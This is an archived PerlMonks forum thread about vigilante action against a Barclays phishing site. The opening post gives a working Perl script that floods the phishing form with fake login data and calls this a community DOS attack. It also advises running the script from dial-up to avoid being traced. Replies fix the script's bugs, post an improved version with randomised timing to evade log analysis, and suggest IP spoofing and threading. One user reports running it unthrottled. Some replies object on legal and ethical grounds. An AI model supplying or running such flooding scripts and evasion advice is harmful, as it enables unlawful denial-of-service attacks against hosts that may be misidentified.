Beefy Boxes and Bandwidth Generously Provided by pair Networks
The stupid question is the question not asked
 
PerlMonks  

Enough is Enough - Taking the fight back to the Internet scammers

by Anonymous Monk
on Oct 28, 2003 at 02:02 UTC ( #302603=perlmeditation: print w/ replies, xml ) Need Help??

OK so we all get SPAM. Perhaps you are like me and occasionally toy with the idea of mail bombing the spammers servers. Perhaps you worry about hitting the wrong target. Perhaps you don't care that much.

For some reason today I decided to care. The subject was yet another SPAM from the Internet Banking Fraudsters who want you to confirm all your login details so they can empty your accounts. Sadly people do and are now losing out as the banks have issued warnings that effectively make it the client's problem.

So I got a new email today. Yet another bank scam. Here is the link purporting to be from Barclays bank and asking for all my user login details:

http://barclays.co.uk:ac-x6LC0IQr2aBda1XBALgF@dxp0fas94.CjB.NeT/?LdZJtDpTt8z1elD

Note the @ in the url (add one to a url if you don't know what it does ie http://here.com@go.there.com end up at go.there.com)

You end up with two windows. The main one is the REAL Barclays site but the pop up that comes before it is the scam: barcl.pisem.net/welcome3.html

Have a look at the source (it is ripped off from the ib.national.com.au scam - note that they have not even fixed the style sheet link)

If you feel in the mood to strike back then you might like to run this little script in the background for a while. All the script does is fill in the form with random data designed to look exactly like real data would. The desired result is to ruin the scam logs so if there is anyone stupid enough to fill in this form (there will be) their valid data should get lost in all this useless data. The random data should be identical to valid data making it impossible to automatically parse out:

#!/usr/bin/perl use LWP::UserAgent; my $ua = LWP::UserAgent->new; my $SLEEP = 1; my $DEBUG = 1; my $LOG_FILL = 20,000; # how many entries will we add to the scam log +? while(1) { my $IE = sprintf "%.1f", ( 5.0, 5.1, 5.5, 6.0, 6.1 )[rand(5)]; my $WIN = sprintf "%.1f", ( 4.0, 4.1, 5.1 )[rand(3)]; my $bs = join '', map{ ('a'..'z')[rand(26)] }1..(rand(5)+3); my $agent = "Mozilla/4.0 (compatible; MSIE $IE; Windows NT $WIN; $ +bs)"; $ua->agent( $agent ); $DEBUG && print $agent, $/; my $user = sprintf "%08d", rand(99999999); my $pass = sprintf "%05d", rand(99999); my $name = ucfirst join '', map{ ('a'..'z')[rand(26)] }1..(rand(5) ++3); my $word = join '', map{ ('a'..'z')[rand(26)] }1..(rand(3)+5); my $url = "http://barcl.pisem.net/obr2.html?name=$name&user=$user& +pass=$pass&word=$wordgo=hm&loginButton=%20%20Verify%20%20"; $DEBUG && print $url, $/; my $request = HTTP::Request->new( 'GET', $url ); my $response = $ua->request( $request ); $DEBUG && print $response->content; sleep $SLEEP; $LOG_FILL--; die "Done!\n" if $LOG_FILL == 0; }

Yes this is in effect a request for a community DOS attack. While I do not condone DOS it seems to me that if a few Internet savvy people examine the evidence, can make a positive ID, and can see a valid opportunity prevent to scams like this from making enough money to be worthwhile......why not? You WILL probably save at least one person from losing their life savings and that has to be a good thing.

Because of the warnings the banks are issuing anyone who fills in one of these forms and loses money has basically done their dough. This is theft pure and simple. Personally I think the banks ought to be DOSing these guys and hosing them off the Internet.

Don't get mad, get even

I suppose I could ask one of my more dubious assocites to take the server down but that would probably hurt inoccent users as well. Sure I have reported it to Barclays but the server is in russia so they will not really be able to stop it. They probably don't care as their disclamer makes it THE CLIENTS problem. If everyone who knows a little Perl and gets these emails was to respond likewise we could put these creeps out of business in a week. Minimum collateral damage and it should really annoy the scamsters. Do it from dial up and they will never be able to track you down either. I would not run it from a fixed IP cause they will probably be pretty pissed off.

Comment on Enough is Enough - Taking the fight back to the Internet scammers
Download Code
Re: Enough is Enough - Taking the fight back to the Internet scammers
by tachyon (Chancellor) on Oct 28, 2003 at 02:20 UTC

    Interesting concept. Not entirely Perl related but then I guess this is a Meditation.

    There is a bug in this line (would have been caught by use strict :-) $wordgo=hm should read $word&go=hm.

    my $url = "http://barcl.pisem.net/obr2.html?name=$name&user=$user&pass +=$pass&word=$wordgo=hm&loginButton=%20%20Verify%20%20"; # it should be: my $url = "http://barcl.pisem.net/obr2.html?name=$name&user=$user&pass +=$pass&word=$word&go=hm&loginButton=%20%20Verify%20%20";

    Also = 20,000 means = 20 void context 000. You probably meant = 20_000 or = 20000

    cheers

    tachyon

    s&&rsenoyhcatreve&&&s&n.+t&"$'$`$\"$\&"&ee&&y&srve&&d&&print

      Oops. Perl is not my first language (guess it shows :-)

      i might be missing something here but why the hell don't Barclays detected when the referrer is the scammer and display a large warning message on their homepage? my only guess is they don't care.
        If Barclays were to post a large prominent warning on their web site then the 97-99% of their electronic banking customers that didn't get this email might get nervous and choose not to use the online service. Leading to a lines at branches. Which is a bad thing.
Re: Enough is Enough - Taking the fight back to the Internet scammers
by sauoq (Abbot) on Oct 28, 2003 at 02:35 UTC

    I'm not exactly opposed to vigilantism in a case like this but I don't expect it would be very effective. I'm reminded of the little dutch boy plugging a hole in the dike with his finger. It's really far too easy to move to another server, IP, and or domain name.

    The only real way to combat this kind of thing is with education.

    The random data should be identical to valid data making it impossible to automatically parse out:

    I think that's being optimistic. With IPs and datestamps, it would probably be pretty easy to separate the list into "probably real" and "probably not real" piles.

    Sure I have reported it to Barclays but the server is in russia so they will not really be able to stop it. They probably don't care as their disclamer makes it THE CLIENTS problem.

    I would guess they would care a great deal. The monies in the bank are probably insured against fraud up to some amount. Besides, banks make money by holding onto yours. They don't want to lose their customers' money to someone that will go put it in another bank, right? And, really, they don't want to lose your future business either. I would think that banks take a great deal of interest in this sort of thing.

    I suppose I could ask one of my more dubious assocites to take the server down but that would probably hurt inoccent users as well.

    I wouldn't worry about the other users. It is likely that there are no legitimate users of the machine or that the hosting provider is at least aware of the illegitmate users. But again, it's simply too easy for the perpetrators to move on, so I don't really see the point (except maybe to feel like you got a little revenge.)

    -sauoq
    "My two cents aren't worth a dime.";
    

      With IPs and datestamps, it would probably be pretty easy to separate the list into "probably real" and "probably not real" piles.

      Besides the bugs in the code this could be harder than expected. You would need certain elements in the raw data file as well as the 4 significant data fields you might presume the script is writing. A parallel log analysis might show you when you were being bombed and from where but you need to accurately correllate that with the data. A low order continuous DOS would make this problematic anyway as all data would become suspect. The general idea of adding a haystack to hide the needles seems like not a bad approach.

      Of course there are plenty of fixes for it but it does require that those fixes get implemented. Given that it appears that this site is a clone of a scam on the National bank it is possible that while the perps are creative they are at a script kiddy level. The form they present looks nowhere near as high quality as some I have seen which are a perfect match for the target site.

      As you don't need the return data you would really want to spoof the sending IP address. Better simulated names (ie taken from a real name list) and Secret words taken from say the Unix dictionary would also add more realism.

      Education is a nice thought but if you take virus spread as an example some people are difficult to educate.

      cheers

      tachyon

      s&&rsenoyhcatreve&&&s&n.+t&"$'$`$\"$\&"&ee&&y&srve&&d&&print

        A parallel log analysis might show you when you were being bombed and from where but you need to accurately correllate that with the data.

        The assumption being that they don't log both together... and maybe they don't. I would, though, if I were pulling a scam like this. (And, if they aren't this time, they probably will next time.)

        As you don't need the return data you would really want to spoof the sending IP address.

        That would certainly help.

        Education is a nice thought but if you take virus spread as an example some people are difficult to educate.

        I agree entirely. Of course, losing one's savings might be a lesson that's hard to forget. Regardless of whether or not education is an effective solution, it is the only real one. Like I said though, I'm not opposed to vigilantism in a case like this; I'm just trying to make a realistic assessment of how effective it would be in the long run. My conclusion remains: "not very."

        -sauoq
        "My two cents aren't worth a dime.";
        
Re: Enough is Enough - Taking the fight back to the Internet scammers
by TVSET (Chaplain) on Oct 28, 2003 at 02:56 UTC
    Firstly, as I have already recommended here, you should use Mail::SpamAssassin. This will increase your productivity, and I mean with useful stuff. :)

    Secondly, while I agree with your "Don't get mad, get even" statement, I disagree with methodology. I don't think that attacking bad guys will lead you anywhere. I would instead help the good guys. And one of the ways to help good guys is education. Banks (and other organizations) should be properly notified that about bad guys around spoofing their sites and producing all sorts of other dirt. Users should be educated about different techniques of misleading them, such as "@" character in the URL. They should be taught to make sure that they are using secure connection with the properly signed and generated certificate from the appropriate bank.

    I beleive that a well educated user is capable of securing himself/herself from a great variety of problems.

    Take these 2 cents, they are yours. :)

    Update: sauoq is faster then me. :)

      I'm slowly getting the feeling that things like SpamAssassin arent enough. Recently Ive been getting several bits of spam that only turn up a 1.2->3.0 on the SA scale, and so still get delivered.. (I bet I get real mail that has a worse count than that..)..

      So much so that I'm considering making a list from which I will accept mail, and getting everything else directed to a delete box, where it will be deleted if I dont add the address to my list..

      (Hmm,m wonder if anyone has done this already..)

      C.

        (Hmm,m wonder if anyone has done this already..)

        Yes, they have. Browse the Email Filters section on freshmeat. If you've got a user account there you should be able to search in that category for "whitelist" (you may be able to do this without an account, it's been a while).


        davis
        It's not easy to juggle a pregnant wife and a troubled child, but somehow I managed to fit in eight hours of TV a day.

        We do Bayesian stats work as part of a different project and have a filter based on that (proprietary I'm afraid) although there is popmail Popfile on sourcforge which is OK.

        Bayesian stat analysis is probably one step past Spam Assassin but still has the following inherent problems. These apply to all forms of spam filters. First if the filter is publically available (as it must effectively be to be used) then you can craft spam and test it against the filter(s). Regardless of what they are looking for and how they rate spam messages in the form:

        Dear Name RE: Your recent blah blah blah Thanks for your enquiry. Blah blah blah. Please take the time to have +a look at: http://blah.com/cgi-bin/special_offer?name=Name&code=AGERSDGFTGER I wish you all the best in your endeavour. Kind Regards John Smith Director Blah.com Street Address Phone Number Fax Number Mobile Number BLAH Making it happen http://blah.com foo@blah.com The information transmitted may be confidential, is intended only for +the person to which it is addressed, and may not be reviewed, retransmitte +d, disseminated or relied upon by any other persons. If you received this message in error, please contact the sender and destroy any paper or electronic copies of this message. Any views expressed in this email communication are those of the individual sender, except where the sender specifically states otherwise. Blah does not represent, warrant or guarantee that the communication is free of errors, virus o +r interference.

        are statistically next to impossible to pick. The problem with the basic mail protocol is that you can forge headers ie there is no way to validate the sending server. Given this you can more of less craft your emails so they will pass any Spam filter.

        Messages like this are the new face of spam. Still spam but crafted to look like a standard valid (perhaps corporate) reply. It will be next to impossible to stop mail in this form.

        As a result the challenge response/whitelist passthrough is probably the way it will end up in the medium term. Then of course the spammers will implement respond bots and the cycle will continue.

        What is needed is a modification to the underlying protocol so that there is an inbuilt challenge response or security key of some form so that the recipient server can query the supposed sending server to see if it was really the source of the message. If you can do that you can work blacklists of spam servers far more effectively.

        cheers

        tachyon

        s&&rsenoyhcatreve&&&s&n.+t&"$'$`$\"$\&"&ee&&y&srve&&d&&print

        There is one thing I've found that DOES effectively prevent Spam. Mailblocks uses a "verify" technique that works pretty much 100%. There are only two drawbacks: 1) it costs money/yr and 2) while they have ways of letting things like orders through, sometimes you just use your e-mail account and things that are NOT going to reply to their message end up in the pending box so you still have to keep your eye on it. But only sometimes. It has been the only way I've found to effectively combat spam. Maybe one day spammers will get by it, but for now, it works.
Re: Enough is Enough - Taking the fight back to the Internet scammers
by pg (Canon) on Oct 28, 2003 at 02:56 UTC

    I am wondering why there is a sleep in your while loop.

    On the contrary, if you really want to do something like this, start multiple threads, and have them sending together. That's pretty useful, otherwise your connection is idle most of the time.

      The idea was not so much DOS just to 'hide' the real data in a sea of rubbish. The idea of the sleep was so say you ran it for a day or two every 60 seconds (load and bandwith use is very small so it does not annoy you). Even if target analyse the logs all they see is a steady trickle so all data becomes suspect over an extended period. If lots of people did just a few there would also be lots of IPs.

        Not taking sides here. But if you want to make it harder for them to spot it in logs, add some random element (included tachyons fixes as well).
        #!/usr/bin/perl use LWP::UserAgent; my $ua = LWP::UserAgent->new; my $MAX_SLEEP = 5; # max seconds to sleep my $DEBUG = 1; my $LOG_FILL = 20000; # how many entries will we add to the scam log? while(1) { my $IE = sprintf "%.1f", ( 5.0, 5.1, 5.5, 6.0, 6.1 )[rand(5)]; my $WIN = sprintf "%.1f", ( 4.0, 4.1, 5.1 )[rand(3)]; my $bs = join '', map{ ('a'..'z')[rand(26)] }1..(rand(5)+3); my $agent = "Mozilla/4.0 (compatible; MSIE $IE; Windows NT $WIN; $ ++bs)"; $ua->agent( $agent ); $DEBUG && print $agent, $/; my $user = sprintf "%08d", rand(99999999); my $pass = sprintf "%05d", rand(99999); my $name = ucfirst join '', map{ ('a'..'z')[rand(26)] }1..(rand(5) ++3); my $word = join '', map{ ('a'..'z')[rand(26)] }1..(rand(3)+5); my $url = "http://barcl.pisem.net/obr2.html?name=$name&user=$user& +pass=$pass&word=$word&go=hm&loginButton=%20%20Verify%20%20"; $DEBUG && print $url, $/; my $request = HTTP::Request->new( 'GET', $url ); my $response = $ua->request( $request ); $DEBUG && print $response->content; sleep (int(rand ($MAX_SLEEP))+1); $LOG_FILL--; die "Done!\n" if $LOG_FILL == 0; }
Re: Enough is Enough - Taking the fight back to the Internet scammers
by Jaap (Curate) on Oct 28, 2003 at 11:44 UTC
    Ok i'm running a slightly modified version now (with tachyon's bugfixes, strict and warnings and without the sleep).
    I figure i'd try to keep the server busy handling my requests, so there is no time to handle innocent spamreaders' requests.
Re: Enough is Enough - Taking the fight back to the Internet scammers
by IlyaM (Parson) on Oct 28, 2003 at 12:24 UTC
    Sure I have reported it to Barclays but the server is in russia so they will not really be able to stop it.

    IIRC pisem.net just provides free web hosting services. I doubt they are related to the scummers in any way other that scummers are abusing their free web hosting services. Given most ISPs are quite responsive to reports about spamers and scummers utilizing their resources I bet most effective way to stop this is it to report to abuse@pisem.net.

    --
    Ilya Martynov, ilya@iponweb.net
    CTO IPonWEB (UK) Ltd
    Quality Perl Programming and Unix Support UK managed @ offshore prices - http://www.iponweb.net
    Personal website - http://martynov.org

Re: Enough is Enough - Taking the fight back to the Internet scammers
by bassplayer (Monsignor) on Oct 28, 2003 at 14:10 UTC
    I gave this node a ++, because I think it is an interesting discussion, and I hate spammers and scammers as much as the next monk. I do, however, have reservations about whether innocent victims could be affected. This seems to be a clear cut case, but what about the next one? Is analysis by a tech a fair trial? Movies such as 12 Angry Men and especially The Star Chamber portray the point I am trying to make rather well.

    bassplayer

Re: Enough is Enough - Taking the fight back to the Internet scammers
by zentara (Archbishop) on Oct 28, 2003 at 16:08 UTC
    Maybe Perlmonks needs a new category: "DOS-of-the-day", so we can all post scripts to attack our favorite spammers. The one I'm getting now is "You've won the lottery" contact us to collect your "prize".
Re: Enough is Enough - Taking the fight back to the Internet scammers
by Anonymous Monk on Oct 29, 2003 at 02:33 UTC

    I won't comment on the possible legal ramifications of this post, because they should be obvious to anyone doing 30 seconds of research. What I will comment on is how completely futile your efforts are. You're sending multiple requests, all they have to do is block every ip with more than 2 form submissions and your efforts become a miniscule DOS attack (which is illegal in your country, oops guess I saved you 30 seconds).

    Do it from dial up and they will never be able to track you down either.

    Welcome to the Internet my friend. First lesson - you are not anonymous. All that has to be done is contact your ISP with the violation and your identity becomes known to them, and law enforcement agencies.

    Way to be a script kiddie.

    P.S. I don't understand all the posts in this thread. Am I missing something, or has Perlmonks really slid this far down?

      Am I missing something, or has Perlmonks really slid this far down?

      Slid so far down as to discuss technical means of subverting internet scam artists intent on stealing bank accounts from unsuspecting grandmothers?

      What I will comment on is how completely futile your efforts are.

      Got to agree with that... I myself have said as much in this thread.

      all they have to do is block every ip with more than 2 form submissions

      Not if they hope to get more than one set of credentials from an ISP that uses proxy servers like, for one small example, AOL. And, as tachyon mentioned, IP spoofing might be helpful in that regard.

      I won't comment on the possible legal ramifications of this post

      So, you would be worried that these thieving scumbags would run to the law and file a grievance alleging you attempted to disrupt their scam to steal bank accounts?

      -sauoq
      "My two cents aren't worth a dime.";
      
        Vigilante "justice" is not justice. Whether you're talking about DOSing email scams or shooting abortion doctors or unilaterally toppling dictatorial regimes, failing to follow the rule of law is to join your enemies at their level.

        Taking the law into your own hands assumes that you alone know what's right and wrong, and that your judgement is infallible. There are appropriate methods to achieve your goals. To remain within society, you must follow the social methods: those which have the proper procedural oversight and just review.

        --
        [ e d @ h a l l e y . c c ]

        Slid so far down as to discuss technical means of subverting internet scam artists intent on stealing bank accounts from unsuspecting grandmothers?

        That answered my question perfectly.

        It was good while it lasted. I'll be leaving now, goodbye.

Re: Enough is Enough - Taking the fight back to the Internet scammers
by Anonymous Monk on Dec 06, 2003 at 19:42 UTC
    I'm working on a tool that will handle this type of job. Visit Project Web Form Flooder at http://formflood.sourceforge.net

Log In?
Username:
Password:

What's my password?
Create A New User
Node Status?
node history
Node Type: perlmeditation [id://302603]
Approved by sauoq
Front-paged by hsmyers
help
Chatterbox?
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others romping around the Monastery: (7)
As of 2014-09-30 21:48 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    How do you remember the number of days in each month?











    Results (384 votes), past polls